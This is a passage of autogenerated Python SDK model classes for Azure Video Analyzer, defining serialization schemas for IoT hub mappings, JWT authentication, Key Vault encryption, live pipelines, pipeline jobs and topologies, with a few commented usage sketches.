super(GroupLevelAccessControl, self).__init__(**kwargs)
self.public_network_access = kwargs.get('public_network_access', None)
class IotHub(msrest.serialization.Model):
"""The IoT Hub details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param id: Required. The IoT Hub resource identifier.
:type id: str
:param identity: Required. The IoT Hub identity.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the Iot Hub mapping.
:vartype status: str
"""
_validation = {
'id': {'required': True},
'identity': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(IotHub, self).__init__(**kwargs)
self.id = kwargs['id']
self.identity = kwargs['identity']
self.status = None
class JwtAuthentication(AuthenticationBase):
"""Properties for access validation based on JSON Web Tokens (JWT).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param issuers: List of expected token issuers. Token issuer is valid if it matches at least
one of the given values.
:type issuers: list[str]
:param audiences: List of expected token audiences. Token audience is valid if it matches at
least one of the given values.
:type audiences: list[str]
:param claims: List of additional token claims to be validated. Token must contains all claims
and respective values for it to be valid.
:type claims: list[~video_analyzer.models.TokenClaim]
:param keys: List of keys which can be used to validate access tokens. Having multiple keys
allow for seamless key rotation of the token signing key. Token signature must match exactly
one key.
:type keys: list[~video_analyzer.models.TokenKey]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'issuers': {'key': 'issuers', 'type': '[str]'},
'audiences': {'key': 'audiences', 'type': '[str]'},
'claims': {'key': 'claims', 'type': '[TokenClaim]'},
'keys': {'key': 'keys', 'type': '[TokenKey]'},
}
def __init__(
self,
**kwargs
):
super(JwtAuthentication, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.JwtAuthentication' # type: str
self.issuers = kwargs.get('issuers', None)
self.audiences = kwargs.get('audiences', None)
self.claims = kwargs.get('claims', None)
self.keys = kwargs.get('keys', None)
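# Illustrative sketch only (not part of the generated SDK code): a JwtAuthentication
# payload is built from keyword arguments matching the attribute map above, e.g.
#
#   auth = JwtAuthentication(
#       issuers=["https://issuer.example"],            # hypothetical issuer
#       audiences=["https://videoanalyzer.example"],   # hypothetical audience
#       keys=[],
#   )
#
# and can then be assigned to an AccessPolicyEntity's ``authentication`` property.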
class KeyVaultProperties(msrest.serialization.Model):
"""The details for accessing the encryption keys in Key Vault.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param key_identifier: Required. The URL of the Key Vault key used to encrypt the account. The
key may either be versioned (for example https://vault/keys/mykey/version1) or reference a key
without a version (for example https://vault/keys/mykey).
:type key_identifier: str
:ivar current_key_identifier: The current key used to encrypt Video Analyzer account, including
the key version.
:vartype current_key_identifier: str
"""
_validation = {
'key_identifier': {'required': True},
'current_key_identifier': {'readonly': True},
}
_attribute_map = {
'key_identifier': {'key': 'keyIdentifier', 'type': 'str'},
'current_key_identifier': {'key': 'currentKeyIdentifier', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(KeyVaultProperties, self).__init__(**kwargs)
self.key_identifier = kwargs['key_identifier']
self.current_key_identifier = None
class ListProvisioningTokenInput(msrest.serialization.Model):
"""The input parameters to generate registration token for the Azure Video Analyzer IoT edge module.
All required parameters must be populated in order to send to Azure.
:param expiration_date: Required. The desired expiration date of the registration token. The
Azure Video Analyzer IoT edge module must be initialized and connected to the Internet prior to
the token expiration date.
:type expiration_date: ~datetime.datetime
"""
_validation = {
'expiration_date': {'required': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(ListProvisioningTokenInput, self).__init__(**kwargs)
self.expiration_date = kwargs['expiration_date']
class LivePipeline(ProxyResource):
"""Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: The reference to an existing pipeline topology defined for real-time
content processing. When activated, this live pipeline will process content according to the
pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The
allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds
this capacity, then the service will temporarily disconnect from the camera. It will then retry
to re-establish the connection (with exponential backoff), checking whether the camera bitrate
has dropped back below the reserved capacity. This ensures that one 'noisy neighbor' does not
affect other live pipelines in your account.
:type bitrate_kbps: int
:ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive",
"Activating", "Active", "Deactivating".
:vartype state: str or ~video_analyzer.models.LivePipelineState
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameter values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'},
'state': {'key': 'properties.state', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(LivePipeline, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.state = None
self.parameters = kwargs.get('parameters', None)
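# A minimal usage sketch (illustrative only; the topology name and the "rtspUrl" parameter
# are placeholders and must match declarations in the referenced topology):
#
#   pipeline = LivePipeline(
#       topology_name="motion-detection-topology",
#       description="Front-door camera",
#       bitrate_kbps=1500,
#       parameters=[ParameterDefinition(name="rtspUrl", value="rtsp://camera.local:554/stream")],
#   )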
class LivePipelineCollection(msrest.serialization.Model):
"""A collection of LivePipeline items.
:param value: A collection of LivePipeline items.
:type value: list[~video_analyzer.models.LivePipeline]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[LivePipeline]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class LivePipelineOperationStatus(msrest.serialization.Model):
"""Used for tracking the status of an operation on the live pipeline.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the live pipeline operation.
:vartype name: str
:ivar status: The status of the live pipeline operation.
:vartype status: str
:ivar error: The error details for the live pipeline operation.
:vartype error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'readonly': True},
'status': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineOperationStatus, self).__init__(**kwargs)
self.name = None
self.status = None
self.error = None
class LivePipelineUpdate(ProxyResource):
"""Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: The reference to an existing pipeline topology defined for real-time
content processing. When activated, this live pipeline will process content according to the
pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The
allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds
this capacity, then the service will temporarily disconnect from the camera. It will then retry
to re-establish the connection (with exponential backoff), checking whether the camera bitrate
has dropped back below the reserved capacity. This ensures that one 'noisy neighbor' does not
affect other live pipelines in your account.
:type bitrate_kbps: int
:ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive",
"Activating", "Active", "Deactivating".
:vartype state: str or ~video_analyzer.models.LivePipelineState
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameter values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'},
'state': {'key': 'properties.state', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineUpdate, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.state = None
self.parameters = kwargs.get('parameters', None)
class LogSpecification(msrest.serialization.Model):
"""A diagnostic log emitted by service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The diagnostic log category name.
:vartype name: str
:ivar display_name: The diagnostic log category display name.
:vartype display_name: str
:ivar blob_duration: The time range for requests in each blob.
:vartype blob_duration: str
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'blob_duration': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'blob_duration': {'key': 'blobDuration', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LogSpecification, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.blob_duration = None
class MetricDimension(msrest.serialization.Model):
"""A metric dimension.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The metric dimension name.
:vartype name: str
:ivar display_name: The display name for the dimension.
:vartype display_name: str
:ivar to_be_exported_for_shoebox: Whether to export metric to shoebox.
:vartype to_be_exported_for_shoebox: bool
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'to_be_exported_for_shoebox': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'to_be_exported_for_shoebox': {'key': 'toBeExportedForShoebox', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(MetricDimension, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.to_be_exported_for_shoebox = None
class MetricSpecification(msrest.serialization.Model):
"""A metric emitted by service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The metric name.
:vartype name: str
:ivar display_name: The metric display name.
:vartype display_name: str
:ivar display_description: The metric display description.
:vartype display_description: str
:ivar unit: The metric unit. Possible values include: "Bytes", "Count", "Milliseconds".
:vartype unit: str or ~video_analyzer.models.MetricUnit
:ivar aggregation_type: The metric aggregation type. Possible values include: "Average",
"Count", "Total".
:vartype aggregation_type: str or ~video_analyzer.models.MetricAggregationType
:ivar lock_aggregation_type: The metric lock aggregation type. Possible values include:
"Average", "Count", "Total".
:vartype lock_aggregation_type: str or ~video_analyzer.models.MetricAggregationType
:param supported_aggregation_types: Supported aggregation types.
:type supported_aggregation_types: list[str]
:ivar dimensions: The metric dimensions.
:vartype dimensions: list[~video_analyzer.models.MetricDimension]
:ivar enable_regional_mdm_account: Indicates whether regional MDM account is enabled.
:vartype enable_regional_mdm_account: bool
:ivar source_mdm_account: The source MDM account.
:vartype source_mdm_account: str
:ivar source_mdm_namespace: The source MDM namespace.
:vartype source_mdm_namespace: str
:ivar supported_time_grain_types: The supported time grain types.
:vartype supported_time_grain_types: list[str]
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'display_description': {'readonly': True},
'unit': {'readonly': True},
'aggregation_type': {'readonly': True},
'lock_aggregation_type': {'readonly': True},
'dimensions': {'readonly': True},
'enable_regional_mdm_account': {'readonly': True},
'source_mdm_account': {'readonly': True},
'source_mdm_namespace': {'readonly': True},
'supported_time_grain_types': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'display_description': {'key': 'displayDescription', 'type': 'str'},
'unit': {'key': 'unit', 'type': 'str'},
'aggregation_type': {'key': 'aggregationType', 'type': 'str'},
'lock_aggregation_type': {'key': 'lockAggregationType', 'type': 'str'},
'supported_aggregation_types': {'key': 'supportedAggregationTypes', 'type': '[str]'},
'dimensions': {'key': 'dimensions', 'type': '[MetricDimension]'},
'enable_regional_mdm_account': {'key': 'enableRegionalMdmAccount', 'type': 'bool'},
'source_mdm_account': {'key': 'sourceMdmAccount', 'type': 'str'},
'source_mdm_namespace': {'key': 'sourceMdmNamespace', 'type': 'str'},
'supported_time_grain_types': {'key': 'supportedTimeGrainTypes', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(MetricSpecification, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.display_description = None
self.unit = None
self.aggregation_type = None
self.lock_aggregation_type = None
self.supported_aggregation_types = kwargs.get('supported_aggregation_types', None)
self.dimensions = None
self.enable_regional_mdm_account = None
self.source_mdm_account = None
self.source_mdm_namespace = None
self.supported_time_grain_types = None
class NetworkAccessControl(msrest.serialization.Model):
"""Network access control for video analyzer account.
:param integration: Public network access for integration group.
:type integration: ~video_analyzer.models.GroupLevelAccessControl
:param ingestion: Public network access for ingestion group.
:type ingestion: ~video_analyzer.models.GroupLevelAccessControl
:param consumption: Public network access for consumption group.
:type consumption: ~video_analyzer.models.GroupLevelAccessControl
"""
_attribute_map = {
'integration': {'key': 'integration', 'type': 'GroupLevelAccessControl'},
'ingestion': {'key': 'ingestion', 'type': 'GroupLevelAccessControl'},
'consumption': {'key': 'consumption', 'type': 'GroupLevelAccessControl'},
}
def __init__(
self,
**kwargs
):
super(NetworkAccessControl, self).__init__(**kwargs)
self.integration = kwargs.get('integration', None)
self.ingestion = kwargs.get('ingestion', None)
self.consumption = kwargs.get('consumption', None)
class NodeInput(msrest.serialization.Model):
"""Describes an input signal to be used on a pipeline node.
All required parameters must be populated in order to send to Azure.
:param node_name: Required. The name of the upstream node in the pipeline whose output is used
as an input to the current node.
:type node_name: str
"""
_validation = {
'node_name': {'required': True},
}
_attribute_map = {
'node_name': {'key': 'nodeName', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(NodeInput, self).__init__(**kwargs)
self.node_name = kwargs['node_name']
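# A minimal usage sketch (illustrative only; "rtspSource" is a placeholder and must match
# the name of an upstream node in the same topology):
#
#   sink_input = NodeInput(node_name="rtspSource")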
class Operation(msrest.serialization.Model):
"""An operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. The operation name.
:type name: str
:param display: The operation display name.
:type display: ~video_analyzer.models.OperationDisplay
:param origin: Origin of the operation.
:type origin: str
:param properties: Operation properties format.
:type properties: ~video_analyzer.models.Properties
:param is_data_action: Whether the operation applies to data-plane.
:type is_data_action: bool
:param action_type: Indicates the action type. Possible values include: "Internal".
:type action_type: str or ~video_analyzer.models.ActionType
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
'origin': {'key': 'origin', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'Properties'},
'is_data_action': {'key': 'isDataAction', 'type': 'bool'},
'action_type': {'key': 'actionType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.name = kwargs['name']
self.display = kwargs.get('display', None)
self.origin = kwargs.get('origin', None)
self.properties = kwargs.get('properties', None)
self.is_data_action = kwargs.get('is_data_action', None)
self.action_type = kwargs.get('action_type', None)
class OperationCollection(msrest.serialization.Model):
"""A collection of Operation items.
:param value: A collection of Operation items.
:type value: list[~video_analyzer.models.Operation]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Operation]'},
}
def __init__(
self,
**kwargs
):
super(OperationCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class OperationDisplay(msrest.serialization.Model):
"""Operation details.
:param provider: The service provider.
:type provider: str
:param resource: Resource on which the operation is performed.
:type resource: str
:param operation: The operation type.
:type operation: str
:param description: The operation description.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(OperationDisplay, self).__init__(**kwargs)
self.provider = kwargs.get('provider', None)
self.resource = kwargs.get('resource', None)
self.operation = kwargs.get('operation', None)
self.description = kwargs.get('description', None)
class ParameterDeclaration(msrest.serialization.Model):
"""Single topology parameter declaration. Declared parameters can and must be referenced throughout the topology and can optionally have default values to be used when they are not defined in the pipelines.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the parameter.
:type name: str
:param type: Required. Type of the parameter. Possible values include: "String",
"SecretString", "Int", "Double", "Bool".
:type type: str or ~video_analyzer.models.ParameterType
:param description: Description of the parameter.
:type description: str
:param default: The default value for the parameter to be used if the pipeline does not specify
a value.
:type default: str
"""
_validation = {
'name': {'required': True},
'type': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'default': {'key': 'default', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ParameterDeclaration, self).__init__(**kwargs)
self.name = kwargs['name']
self.type = kwargs['type']
self.description = kwargs.get('description', None)
self.default = kwargs.get('default', None)
class ParameterDefinition(msrest.serialization.Model):
"""Defines the parameter value of an specific pipeline topology parameter. See pipeline topology parameters for more information.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the parameter declared in the pipeline topology.
:type name: str
:param value: Parameter value to be applied on this specific pipeline.
:type value: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ParameterDefinition, self).__init__(**kwargs)
self.name = kwargs['name']
self.value = kwargs.get('value', None)
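# A minimal usage sketch (illustrative only; the parameter name and value are placeholders):
# the topology declares the parameter once, and each pipeline built from it supplies a value.
#
#   declaration = ParameterDeclaration(
#       name="rtspUrl",
#       type="String",
#       description="RTSP endpoint of the camera",
#   )
#   definition = ParameterDefinition(name="rtspUrl", value="rtsp://camera.local:554/stream")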
class PemCertificateList(CertificateSource):
"""A list of PEM formatted certificates.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param certificates: Required. PEM formatted public certificates. One certificate per entry.
:type certificates: list[str]
"""
_validation = {
'type': {'required': True},
'certificates': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'certificates': {'key': 'certificates', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PemCertificateList, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.PemCertificateList' # type: str
self.certificates = kwargs['certificates']
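# A minimal usage sketch (illustrative only; the certificate body is truncated). Each list
# entry holds exactly one PEM document:
#
#   ca_list = PemCertificateList(certificates=[
#       "-----BEGIN CERTIFICATE-----\n...\n-----END CERTIFICATE-----",
#   ])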
class PipelineJob(ProxyResource):
"""Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: Reference to an existing pipeline topology. When activated, this pipeline
job will process content according to the pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:ivar state: Current state of the pipeline (read-only). Possible values include: "Processing",
"Canceled", "Completed", "Failed".
:vartype state: str or ~video_analyzer.models.PipelineJobState
:ivar expiration: The date-time by when this pipeline job will be automatically deleted from
your account.
:vartype expiration: ~datetime.datetime
:ivar error: Details about the error, in case the pipeline job fails.
:vartype error: ~video_analyzer.models.PipelineJobError
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameter values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
'expiration': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'state': {'key': 'properties.state', 'type': 'str'},
'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'},
'error': {'key': 'properties.error', 'type': 'PipelineJobError'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(PipelineJob, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.state = None
self.expiration = None
self.error = None
self.parameters = kwargs.get('parameters', None)
class PipelineJobCollection(msrest.serialization.Model):
"""A collection of PipelineJob items.
:param value: A collection of PipelineJob items.
:type value: list[~video_analyzer.models.PipelineJob]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PipelineJob]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class PipelineJobError(msrest.serialization.Model):
"""Details about the error for a failed pipeline job.
:param code: The error code.
:type code: str
:param message: The error message.
:type message: str
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobError, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class PipelineJobOperationStatus(msrest.serialization.Model):
"""Used for tracking the status of an operation on the pipeline job.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the pipeline job operation.
:vartype name: str
:ivar status: The status of the pipeline job operation.
:vartype status: str
:ivar error: The error details for the pipeline job operation.
:vartype error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'readonly': True},
'status': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobOperationStatus, self).__init__(**kwargs)
self.name = None
self.status = None
self.error = None
class PipelineJobUpdate(ProxyResource):
"""Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: Reference to an existing pipeline topology. When activated, this pipeline
job will process content according to the pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:ivar state: Current state of the pipeline (read-only). Possible values include: "Processing",
"Canceled", "Completed", "Failed".
:vartype state: str or ~video_analyzer.models.PipelineJobState
:ivar expiration: The date-time by when this pipeline job will be automatically deleted from
your account.
:vartype expiration: ~datetime.datetime
:ivar error: Details about the error, in case the pipeline job fails.
:vartype error: ~video_analyzer.models.PipelineJobError
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameter values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
'expiration': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'state': {'key': 'properties.state', 'type': 'str'},
'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'},
'error': {'key': 'properties.error', 'type': 'PipelineJobError'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobUpdate, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.state = None
self.expiration = None
self.error = None
self.parameters = kwargs.get('parameters', None)
class PipelineTopology(ProxyResource):
"""Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following:
* Parameters: list of user defined parameters that can be references across the topology nodes.
* Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras.
* Processors: list of nodes which perform data analysis or transformations.
* Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param kind: Required. Topology kind. Possible values include: "Live", "Batch".
:type kind: str or ~video_analyzer.models.Kind
:param sku: Required. Describes the properties of a SKU.
:type sku: ~video_analyzer.models.Sku
:param description: An optional description of the pipeline topology. It is recommended that
the expected use of the topology be described here.
:type description: str
:param parameters: List of the topology parameter declarations. Parameters declared here can be
referenced throughout the topology nodes through the use of the "${PARAMETER_NAME}" string pattern.
Parameters can have optional default values and can later be defined in individual instances of
the pipeline.
:type parameters: list[~video_analyzer.models.ParameterDeclaration]
:param sources: List of the topology source nodes. Source nodes enable external data to be
ingested by the pipeline.
:type sources: list[~video_analyzer.models.SourceNodeBase]
:param processors: List of the topology processor nodes. Processor nodes enable pipeline data
to be analyzed, processed or transformed.
:type processors: list[~video_analyzer.models.ProcessorNodeBase]
:param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or
exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'kind': {'required': True},
'sku': {'required': True},
}
_attribute_map = {
